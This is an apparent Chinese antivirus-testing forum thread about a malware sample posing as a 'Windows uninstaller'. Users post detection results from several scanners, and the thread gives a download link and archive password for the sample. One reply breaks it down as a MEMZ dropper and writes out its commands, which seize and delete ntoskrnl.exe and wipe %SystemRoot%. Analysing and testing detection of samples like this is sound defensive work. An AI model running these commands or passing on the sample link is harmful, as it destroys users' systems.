Windows卸载器

shc0743

密码：infected

解压运行setup.bat

vt14/65

运行后弹出控制面板，多出  Microsoft Windows  项


实体机无法运行

ICzcz

ELG分析中：安全

心心相印

md双击阻止运行。

xiaobao233

火绒miss

aboringman

360: 1

1. 2021-12-25 16:23:28     恶意软件(QVM41.2.709F.Malware.Gen)MD5:085f5d5ba58e60f2cda58bf5830abf2c    已删除此文件，如果您发现误删，可从隔离区恢复此文件。        d:\360极速浏览器下载\test\windowsuninstaller.exe

复制代码

anthonyqian

诺顿

文件名: WindowsUninstaller.exe
威胁名称: WS.Reputation.1

11111111111445

avastmiss

Hacker-云

芬安全，卡巴KIS扫描无反应

a27573

一个MEMZ释放器+删除系统文件



检测虚拟机，如果不是则退出：

1. 此程序为病毒,请在虚拟机中运行!!
   
2. 若无法检测虚拟机环境,请使用VMware

复制代码

确认运行：

1. 确定卸载 Windows?

复制代码

释放文件：

1. 7za.exe
   
2. MEMZ.7z

复制代码

https://wwi.lanzouy.com/b0172vdaf
密码:f4kl

运行命令/进程：

1. //解压MEMZ.7z，密码MEMZ
   
2. 7za x MEMZ.7z -pMEMZ
   
3. 
   
4. //运行MEMZ
   
5. cmd /c start "" "geometry dash auto speedhack.exe" /main
   
6. "geometry dash auto speedhack.exe" /watchdog
   
7. 
   
8. //删除系统文件
   
9. takeown /F %SystemRoot%\system32\ntoskrnl.exe
   
10. icacls %SystemRoot%\system32\ntoskrnl.exe /grant %username%:F
    
11. del /f /s /q %SystemRoot%\system32\ntoskrnl.exe
    
12. del /f /s /q %SystemRoot%\

复制代码

确认重启：

1. 卸载已完成!
   
2. 您想现在重新启动以应用更改吗?
   

复制代码

后面都是重启相关的代码

MEMZ.7z解压后ESET报Win32/Zmem.A
但应该拦不了删除系统文件

这个MEMZ比较老，主要是破坏MBR


顺便吐槽：
大名鼎鼎的MEMZ，还不报的杀软可以钉在耻辱柱上了


这个样本BD和一大票OEM了BD的厂商报FakeAV
估计是因为看不懂中文，对着英文名瞎猜



@Eset小粉絲

a27573

ICzcz 发表于 2021-12-25 15:58
ELG分析中：安全

这都能安全。。。
或者是因为做了反虚拟机检测，反而跑不出行为？